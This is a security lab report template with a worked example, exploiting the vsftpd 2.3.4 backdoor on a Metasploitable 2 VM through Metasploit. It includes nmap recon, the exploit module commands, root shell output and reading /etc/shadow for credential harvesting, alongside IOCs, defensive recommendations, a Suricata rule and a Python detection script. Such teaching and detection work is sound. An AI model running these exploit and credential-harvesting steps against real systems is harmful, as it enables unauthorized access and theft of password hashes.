seclab/LAB_REPORT_TEMPLATE.md
2026-05-28 18:27:41 -06:00
# LAB REPORT TEMPLATE
# Apophis Networking Security Lab
**Student Name:** ___________________________
**Module Number:** ___________________________
**Lab Title:** ___________________________
**Date Submitted:** ___________________________
---
## 1. EXECUTIVE SUMMARY (1 paragraph)
Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.
**Example:**
> This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.
---
## 2. OBJECTIVES
List the specific learning objectives for this lab.
**Example:**
- Configure and execute Metasploit Framework exploits
- Understand the mechanics of reverse shell payloads
- Perform post-exploitation enumeration
- Document exploitation chains for penetration testing reports
---
## 3. TOOLS & ENVIRONMENT
### 3.1 Attack Platform
- **OS:** Kali Linux 2024.1
- **IP Address:** 10.10.2.50
- **Tools Used:**
- Metasploit Framework v6.3.x
- Nmap 7.94
- Wireshark 4.0.x
### 3.2 Target System
- **OS:** Metasploitable 2 (Ubuntu 8.04)
- **IP Address:** 10.10.4.10
- **Vulnerable Services:**
- vsftpd 2.3.4 (Port 21)
- OpenSSH 4.7p1 (Port 22)
- Apache 2.2.8 (Port 80)
### 3.3 Network Topology
```
[Kali Linux]              [pfSense Firewall]              [Metasploitable 2]
10.10.2.50  <--->  10.10.2.1 | 10.10.4.1  <--->  10.10.4.10
 VLAN 200                                              VLAN 400
(Red Team)                                         (Victim Network)
```
---
## 4. METHODOLOGY
Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.
### 4.1 Pre-Exploitation: Reconnaissance
**Step 1: Host Discovery**
```bash
nmap -sn 10.10.4.0/24
```
**Output:**
```
Nmap scan report for 10.10.4.10
Host is up (0.00042s latency).
```
**Step 2: Port Scanning**
```bash
sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan
```
**Output:**
```
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.3.4
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1
...
```
**Analysis:** vsftpd 2.3.4 identified; this version is known to contain a backdoor (CVE-2011-2523).
### 4.2 Exploitation
**Step 3: Launch Metasploit**
```bash
msfconsole -q
```
**Step 4: Select Exploit Module**
```bash
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
```
**Output:**
```
[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.4.10:6200 - Shell command shell session 1 opened
```
**Result:** Successful exploitation. Root shell obtained.
### 4.3 Post-Exploitation
**Step 5: Verify Access**
```bash
id
```
**Output:**
```
uid=0(root) gid=0(root)
```
**Step 6: Credential Harvesting**
```bash
cat /etc/shadow
```
**Output:** (Include only the first 3 lines in the report)
```
root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash
daemon:*:14684:0:99999:7:::
...
```
---
## 5. FINDINGS & ANALYSIS
### 5.1 Key Discoveries
**Vulnerability Identified:**
- **CVE:** CVE-2011-2523
- **Severity:** Critical (CVSS 10.0)
- **Description:** vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when the username contains the `:)` smiley face.
- **Exploitability:** Trivial—no authentication required.
**Impact Assessment:**
- **Confidentiality:** HIGH—Full read access to all files including /etc/shadow
- **Integrity:** HIGH—Root access allows file modification
- **Availability:** HIGH—Attacker could delete files or crash system
### 5.2 Network Traffic Analysis
**Wireshark Observations:**
- TCP stream 1: FTP connection (port 21) with malicious username
- TCP stream 2: Shell session on port 6200
- No encryption—all commands visible in plaintext
**Screenshot:** [Include Wireshark screenshot showing backdoor traffic]
---
## 6. INDICATORS OF COMPROMISE (IOCs)
| Type | Value | Description |
|------|-------|-------------|
| IP Address | 10.10.2.50 | Attacker source IP |
| Port | 6200 | vsftpd backdoor listening port |
| Process | vsftpd | Spawned root shell (suspicious parent) |
| Network | TCP SYN to 6200 | Connection to non-standard FTP port |
---
## 7. DEFENSIVE RECOMMENDATIONS
### 7.1 Immediate Actions
1. **Patch vsftpd:** Upgrade to version 3.0.5 or disable service if not needed
2. **Network Segmentation:** Block victim network from initiating connections to Red Team VLAN
3. **IDS Rule:** Deploy Suricata signature for port 6200 connections
### 7.2 Long-Term Improvements
1. **Vulnerability Management:** Implement automated scanning (weekly)
2. **Patch Management:** Establish SLA for critical patches (24-48 hours)
3. **Firewall Rules:** Default-deny egress from victim network
4. **Security Monitoring:** Alert on connections to non-standard ports
---
## 8. DETECTION ENGINEERING
### 8.1 Suricata Rule
```
alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)
```
### 8.2 Security Onion Query (KQL)
```
destination.port: 6200 AND event.module: "suricata"
```
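The Suricata rule in 8.1 fires on any established connection to port 6200, so it also flags whatever else happens to run there, and it only triggers after the backdoor shell is already open. The script below is an added example, not part of the template or of Suricata, that correlates the IOCs from section 6 over Suricata EVE JSON output: the `:)` trigger in an FTP `USER` command on port 21 and a subsequent flow to port 6200 from the same source. The sample records are constructed, and the EVE field names (`event_type`, `ftp.command`, `ftp.command_data`) are assumed to match Suricata's FTP logger.

```python
import json
from collections import defaultdict

# Constructed sample EVE JSON lines (not a real capture): one FTP login whose
# username carries the ":)" trigger, a follow-up flow to port 6200 from the
# same source, and one benign anonymous login from another host.
SAMPLE_EVE = [
    '{"event_type":"ftp","src_ip":"10.10.2.50","src_port":41234,"dest_ip":"10.10.4.10","dest_port":21,"ftp":{"command":"USER","command_data":"student:)"}}',
    '{"event_type":"flow","src_ip":"10.10.2.50","src_port":41240,"dest_ip":"10.10.4.10","dest_port":6200,"proto":"TCP"}',
    '{"event_type":"ftp","src_ip":"10.10.4.20","src_port":50001,"dest_ip":"10.10.4.10","dest_port":21,"ftp":{"command":"USER","command_data":"anonymous"}}',
]

BACKDOOR_PORT = 6200   # listener opened by the vsftpd 2.3.4 backdoor
TRIGGER = ":)"         # substring in the FTP username that activates it


def parse_eve(lines):
    """Parse EVE JSON lines; malformed lines are skipped, not fatal."""
    records = []
    for line in lines:
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def find_backdoor_indicators(records):
    """Collect, per source IP, which of the two IOCs were observed."""
    findings = defaultdict(lambda: {"trigger_user": False, "port_6200": False, "dest": set()})
    for r in records:
        src, dst = r.get("src_ip"), r.get("dest_ip")
        if r.get("event_type") == "ftp" and r.get("dest_port") == 21:
            ftp = r.get("ftp", {})
            if ftp.get("command") == "USER" and TRIGGER in ftp.get("command_data", ""):
                findings[src]["trigger_user"] = True
                findings[src]["dest"].add(dst)
        elif r.get("event_type") == "flow" and r.get("dest_port") == BACKDOOR_PORT:
            findings[src]["port_6200"] = True
            findings[src]["dest"].add(dst)
    return findings


def classify(findings):
    """Both IOCs from one source: critical; a single IOC: suspicious (review)."""
    verdicts = {}
    for src, f in findings.items():
        if f["trigger_user"] and f["port_6200"]:
            verdicts[src] = "critical"
        elif f["trigger_user"] or f["port_6200"]:
            verdicts[src] = "suspicious"
    return verdicts
```

Run it against a real `eve.json` by replacing `SAMPLE_EVE` with the file's lines; a "suspicious" verdict on port 6200 alone is the same false-positive surface the 8.1 rule has, while "critical" requires the FTP trigger as well.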
### 8.3 MITRE ATT&CK Mapping
- **Tactic:** Initial Access (TA0001)
- **Technique:** T1190 - Exploit Public-Facing Application
- **Sub-Technique:** FTP Service Exploitation
---
## 9. CHALLENGES & TROUBLESHOOTING
**Challenge 1:** Initial exploit failed with "connection refused"
**Root Cause:** VLAN tag not set correctly on VM network interface in Proxmox.
**Solution:**
```bash
# Proxmox VM > Hardware > Network Device > Edit
# VLAN Tag: 400 (was blank)
```
**Challenge 2:** Wireshark showed no captured packets
**Root Cause:** Capturing on wrong interface (wlan0 instead of eth0).
**Solution:**
```bash
sudo tcpdump -i eth0 # Verify interface has traffic
sudo wireshark -i eth0
```
---
## 10. LESSONS LEARNED
### What Went Well
- Successful identification and exploitation of vulnerability
- Comprehensive documentation with screenshots
- Effective use of network segmentation for safe testing
### What Could Be Improved
- Faster troubleshooting (spent 30 minutes on VLAN issue)
- More thorough initial reconnaissance (missed some services)
- Should have taken VM snapshot before exploitation
### Key Takeaways
1. **Offensive Perspective:** Outdated software is trivially exploitable—attackers have automated scanners for this.
2. **Defensive Perspective:** One unpatched service can compromise entire network. Defense-in-depth is critical.
3. **Forensics Importance:** Without packet capture, proving the attack vector would be difficult in IR scenario.
---
## 11. APPENDICES
### Appendix A: Command History
```bash
# Full command history from Kali terminal
history > command_history.txt
```
(Attach file: command_history.txt)
### Appendix B: Screenshots
- Screenshot 1: Nmap scan results showing vsftpd 2.3.4
- Screenshot 2: Metasploit successful exploitation
- Screenshot 3: Root shell access (id command output)
- Screenshot 4: Wireshark PCAP showing port 6200 connection
- Screenshot 5: Security Onion alert for detection
### Appendix C: Packet Capture
(Attach file: exploitation.pcapng)
### Appendix D: Metasploit Output Log
(Attach file: msfconsole.log)
---
## 12. REFERENCES
1. National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523
2. Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/
3. MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/
4. OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/
---
## 13. DECLARATION
I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.
**Signature:** ___________________________
**Date:** ___________________________
---
**END OF LAB REPORT**
---
# GRADING RUBRIC FOR THIS REPORT
| Section | Points | Criteria |
|---------|--------|----------|
| Executive Summary | 5 | Clear, concise, non-technical language |
| Methodology | 20 | Step-by-step, reproducible, includes commands |
| Findings & Analysis | 20 | Technical depth, vulnerability details, impact |
| Screenshots | 15 | Relevant, annotated, high-quality |
| Detection Engineering | 15 | Custom rules, MITRE mapping, queries |
| Defensive Recommendations | 10 | Actionable, prioritized, realistic |
| Lessons Learned | 5 | Self-reflection, improvement mindset |
| Documentation Quality | 10 | Formatting, grammar, professionalism |
| **TOTAL** | **100** | |
**Minimum Passing Score:** 70/100